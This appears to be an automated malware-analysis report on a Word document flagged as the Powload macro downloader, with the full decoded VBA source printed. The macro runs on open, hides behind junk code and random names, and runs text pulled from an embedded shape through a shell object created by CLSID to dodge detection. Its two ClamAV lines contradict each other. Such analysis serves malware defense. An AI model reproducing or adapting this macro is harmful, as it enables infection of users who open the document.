Verdict: MALICIOUS
Risk Score: 252
Heuristics: 9

- ClamAV: Doc.Malware.Powload-6813877-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Malware.Powload-6813877-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings). Document contains VBA macro code.
  - VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS). VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script: `End Select Set wcsKMPW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + oDCnE) On Error Resume Next`
  - GetObject call (high, OLE_VBA_GETOBJ). GetObject call.
    Matched line in script: `End Select Set wcsKMPW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + oDCnE) On Error Resume Next`
  - AutoOpen macro (low, OLE_VBA_AUTOOPEN). AutoOpen macro.
    Matched line in script: `Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD). Suspicious cmd.exe invocation with execution flag.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6106 bytes |

SHA-256: 80088535d6e35e3a1f348a690e586e68d18fc8b706bed583dfe7937267cae9fe

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 106 of 165 identifiers look randomly generated (e.g. 'RmMwpSwzcc'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "hiNObQiWDYEE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case svJGmbYH
Case 158480105
TuBdzI = 100818150
hmjhSX = CLng(154629934)
Case 49973352
cjjUq = Oct(UdNHUR)
cVjnBSWqW = WmjUEKcm
Case 229420376
XwXpwdhh = CDate(mButq)
LBfWF = Int(245792762 * FvMiGs)
End Select
On Error Resume Next
Select Case VMEHSz
Case 34007429
GowvAmP = 98085453
kziGUN = CLng(193900659)
Case 272172727
dnCpq = Oct(zaHzjr)
lRNZj = nKKoiC
Case 326384366
YMAzbSR = CDate(RZQznva)
RfWcMRt = Int(308330359 * SBqSwXn)
End Select
Set lVlmTf = Shapes("MFuXFEawd")
On Error Resume Next
Select Case EAXowprIh
Case 175636958
wXJdjff = 128190369
MhtzIuLK = CLng(271785719)
Case 90164233
wobRmTdEc = Oct(ktNuIEf)
NAILIlWHZ = DdjTUjZ
Case 53542201
sqNBbrLbo = CDate(CApfScNm)
fquitwAw = Int(318113877 * ZhVzJn)
End Select
On Error Resume Next
Select Case JoUOcBwXI
Case 230861826
TlVhf = 332137049
SJzlW = CLng(130925528)
Case 294820247
IGuYNbA = Oct(NptwLw)
ZPlCQDs = rKimw
Case 307295000
RAVDtqc = CDate(ViTWHslC)
VlYVlRcVP = Int(35465044 * NioBU)
End Select
RmMwpSwzcc = "" + hUzJicWi + NrGumcEz + CbsOLP + lVlmTf.TextFrame.TextRange.Text + zGbiwSi + AjsRcOE + hMBWUlB + SniXEq + iFvOspT
On Error Resume Next
Select Case ESQbq
Case 186034980
nqnPqlwta = 157518840
kBuvzR = CLng(8524808)
Case 226275858
wXYDs = Oct(zrTuzHmjt)
qRZinI = zGFzLITz
Case 174598431
UzQSj = CDate(woEZjaF)
VAjIzbDTn = Int(250341407 * wntliAv)
End Select
On Error Resume Next
Select Case GpwYuQU
Case 341170000
ULWnN = 65174622
Tvcnot = CLng(59963420)
Case 304429923
qRIwnrDnb = Oct(joiLPU)
cjudZWu = jADdmM
Case 216384215
aEwMC = CDate(dHjMza)
pjMTRQc = Int(881678 * QuNjDq)
End Select
Set wcsKMPW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + oDCnE)
On Error Resume Next
Select Case IASHwlw
Case 133569956
JAwPfV = 275199839
vqKpvwY = CLng(272086867)
Case 201557375
jkhERFNw = Oct(FmaGlHi)
wKKhE = rwLwkN
Case 10287449
STwSkfFjq = CDate(hvkrV)
YhNzcfUG = Int(179567938 * qGFGdlX)
End Select
On Error Resume Next
Select Case rddhalTuh
Case 49742923
bKNzjk = 239731613
kDbOC = CLng(126704641)
Case 294347142
DBbniZTz = Oct(zCzKFiq)
FfAwD = bbDiqPOa
Case 92977947
wPsFUkCq = CDate(bjhmsf)
kHzosrA = Int(136626617 * Mfqdh)
End Select
Const msRtiiVkif = 0
On Error Resume Next
Select Case dkwwvlUF
Case 266552878
NwmpbsZW = 93054126
CGBAtNiO = CLng(184704370)
Case 27925700
quKBHFH = Oct(PTMXcYqt)
WLPRsu = XizEhGGd
Case 238627178
XBboT = CDate(RhzNpiZc)
USrQo = Int(86073492 * zaiZHDHIM)
End Select
On Error Resume Next
Select Case XHXVoLC
Case 337628381
OaIaOjfPR = 313448323
HnzRfNifn = CLng(6268906)
Case 98967505
tqAzk = Oct(XBhVOfwW)
YSpNtn = RjHGqa
Case 216535126
LuzUPjN = CDate(ufutPmZT)
IwGNwn = Int(144348258 * iZRpdt)
End Select
On Error Resume Next
Select Case XiuGAsL
Case 133431020
BwMDZWVOn = 195302397
zVuCEBtjJ = CLng(206016644)
Case 205874979
AFiGP = Oct(uYbidDfsj)
izjqaL = CjrBzwi
Case 72672446
VoMwuQ = CDate(ZtFTV)
rXLSaCLwo = Int(223441697 * hcWXnuaw)
End Select
On Error Resume Next
Select Case fSdCzOCUT
Case 330402462
lJUGT = 61122447
zqUwhjp = CLng(72977763)
Case 332239886
nfZotZk = Oct(QfnkcCjiI)
VNvUKUuVc = luNmQjho
Case 162631142
rjjHCd = CDate(NOSPCaup)
ZSUEtYwD = Int(92880479 * RBUvVuG)
End Select
wcsKMPW.Run! RmMwpSwzcc, msRtiiVkif
On Error Resume Next
Select Case mdYVJT
Case 148734925
aNlDjwL = 61180762
iTfvkw = CLng(312729280)
Case 276100280
mXDzI = Oct(JnaqS)
FcPdll = OVPpvG
Case 264584985
wVBjc = CDate(GhzWaEku)
XUrIYqPRw = Int(72256778 * bjXhItU)
End Select
On Error Resume Next
Select Case VuoojF
Case 73466885
jRVTUnw = 27064471
hJijM = CLng(84534177)
Case 168990742
pjFSkfP = Oct(BrGotFtBu)
aMRDHYPKU = zlJhOPrZ
Case 37865026
zlFcTv = CDate(PKcQhmMmN)
mYhDZ = Int(70199001 * sPiYZiNU)
End Select
On Error Resume Next
Select Case tUzUr
Case 143845965
mQNIskK = 20730742
mtCslLtb = CLng(143378345)
Case 36809092
WjUUis = Oct(fVCmDk)
dljfz = RAmuw
Case 88674424
QiaWzmBDC = CDate(sizYfhizq)
qIZMvW = Int(772506 * VzaYQ)
End Select
End Sub